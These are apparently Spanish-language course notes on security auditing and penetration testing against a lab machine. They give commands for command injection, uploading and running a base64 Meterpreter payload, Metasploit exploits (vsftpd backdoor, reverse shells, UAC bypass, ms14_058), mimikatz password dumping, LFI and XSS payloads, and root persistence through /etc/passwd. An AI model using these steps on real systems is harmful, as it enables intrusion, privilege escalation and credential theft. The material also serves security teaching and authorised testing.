Date post: | 17-Jul-2016 |
Category: |
Documents |
Upload: | pablo-carrefour |
View: | 43 times |
Download: | 2 times |
Zabbix -> monitorizacion tipo nagios
Auditoría de Seguridad
Footprint: HerramientasLa biblia del footprintitngAnubishttp://pastebin.com/
url facebook program firefoxpipi agenda
http://www.exploit-db.com/http://www.exploit-db.com/ghdb/3999/
Fingerprint: Ir a los servidores de la empresa y analizar que servicios ofrecen, version software,.. Se pude engañar a las herramientas. Antifingerprint (no suele ser lo habitual).
Análisis vulnerabilidad sobre lo obtenido del fingerprint
Explotación vulnerabilidades
Informes
Webs interesantes Google hackinghttp://www.e-fense.com/.listing
Vemos contenido del directorio
.bash_history
Bing hacking
IP:87.98.225.244
Hosting compartido, no es una buena práctica
Netcraft: análisis dominios,..
http://www.shodanhq.com/ Busca máquinas
Análisis vulnerabilidades -> Metaexploit
Exploit: programa que sabe aprovecharse de un fallo
Badstore.net distribución con vulnerabilidades para testear
MAQUINA METAEXPLOIT
Command Injection
sacando un 404 (not fount) nos dirá el S.O.nmap -O -p 80 -sV 192.168.56.102
Nos saca que es un linuxpodemos concatenar comandos en la caja de texto;echo "Hola"
con el comando w nos die quien somos, normalmente www-data
Vamos a intentar coger el control de la maquina:Opcion1: con wget podemos decargar un fichero al directorio donde estamos;wget ....
Opcion2: Generar payload (codigo ejecutable) lo subimos en base64 a la maquina remota, lo pasamos a binario y lo ejecutamosCon metaexploit generamos este código que ejecuta un mterpreter para linuxEl código está en base64
;echo "dada5d454d8sad3a1d3as4d8---" >/tmp/taes;ls -l /tmp(tendremos el fichero)
Transformamos el bse64 a binario:;cat /tmp/taes | base64 -d > /tmp/taes.bin(no tenemos permiso de ejeccion)
;chmod 755 /tmp/taes.bin(Tenemos un binario subido a la maquina y con permisos)
Configuramos con metaexploit para que el paylod se nos conecte ejecutamos el taes.bin
En el metaexploit ya tenemos una consola con comandos del meterpreter con permisos limitadosgetuid(nos dice que es el 33 - www-data)
Recopilacion de información de ese sistemaVer página web y sacar info de los php
Con la info del nmap anterior podemos ver la info del apache, buscar más puertos:ftp, ssh, telnet, smtp, dns,....sacamos info del sshnmap -O -p 21,22 -sV 192.168.56.102
metaexploit buscamos vulnerabilidades> search openssh 4.7
Buscamos en google: vsftp 2.4.3 exploit
>use exploit/unix/ftp/vsftp_2_4_3_backdoor>set RHOST 192.168.56.102>set payload cmd/unix/..>exploit
Ya estamos dentro con una shell y somos rootidroot@sofi01:~# iduid=0(root) gid=0(root) groups=0(root)
Para asegurar permisos al otro usuario:Cambiamos el 33 en el /etc/password por 0 y reiniciando somos rootCreamos un usuairo con id 0
Vulnerabilidad LFI
Acceso ficheros locales
OWASP - ZAP
Navegador -> Proxy Ponemos IP puerto de ZAP
En el ZAP vemos las cabeceras que se están enviando a la web
Con SSL se complica.
¿Por qué ocurre?
PHP:include $_GET[param]
url:.........../../../../etc/password
Podemo ver el contenido
Saltar proteccion byte null: Que nos pongan una extensión en el ficherourl:.........../../../../etc/password%00
OPEN DIRECTORY - BROWSING DIRECTORY
192.168.56.102/multididae/documentacion
Acceso a los ficheros -> Nos da información misc configuration
CROSS SITE SCRIPTING - XSS
Ataque al usuario a través del servidor
Manipulamos una url para que cuando el usuario acceda ejecute código js en el navegador del usuario para por ejemplo enviar cookies, ..
Para ver si es vulnerable a esto:
Página ds lookup:
;<scritp>alert(1)</script>
Le hemos pasado un parámetro
Cómo le pasamos el parámetro al usuario:http://dasñdmñsmdlas..../parametro=<script>alert(1)</script>
OPEN REDIRECT
Le pasamos a la urlhttp://añmaddasd/google.com
https://www.google.com.sl/search?source=&q=www.elladodelmal.com&btnI=
EXPLOITS
- Buffer overflow- Integer overflow....
Exploitdb: Nos da la aplicación vulnerable y el sploitHemos de fijarnos en el target que nos da las características del equipo que ha de tener la vulnerabilidad
Demo: Kolibri
Metaexploit kali:
Modules -> /usr/share/metasploit-framework/modules/exploits/(Plataformas)....
msfcliKali -> SystemServices -> metaexploit -> startmsfconsole
Recargar modulosreload_alluse exploit/window/http/33790show optionsinfo -> saca datos del exploitset RHOST IPset PAYLOAD windows/meterprter/reverseset LHOST IP Maquina que devolverá el controlexploit
getuid(nos dice el usuario)
Nos devuelve una consola en el host remoto
Cuando es reverse le configuramos con lhost la ip a la que tiene que volver (túnel inverso)En el caso de bind (directo) nos esperará en un puerto
Si queremos hacer escala de privilegios>use exploit/windows/local/bypasuac
podemos lanzar el exploit de ambito local por la sesión que hemos abierto previamente>sessions
>set PAYLOAD win../meter/inver_tcp>set LH...
Si el usuario no pertenece al grupo administradores puede fallar
bypassuac es como evitar la ventana de ejecutar como administrador
use exploit/windows/local/ms14_058_track_popup_set SESSION 4set PAYLOAD...set LHOST ..exploit
Conseguimos elevación privilegios system
En la consola de meterpreter podemos cargar módulos:>load mimekatz
Nos carga el comando wdigest con el que podemos ver las contraseñas en plano ya que windws cachea las credenciales (proeso lsass)
Armitage -> Interfaz gráficaKali -> Explotation tools -> Network explotation -> Armitage
con session -i numero nos podemos conectar a sesiones que tengamos abiertas
setoolkit
podemos generar un script en poweshell para hacer un meterpreter y que se conecte a nuestro equipo cuando se ejecute en la máquina
Opción 1-> 9 -> 1
Nos pide datos:
El código que nos devuelve lo copiamos en la poweshell destino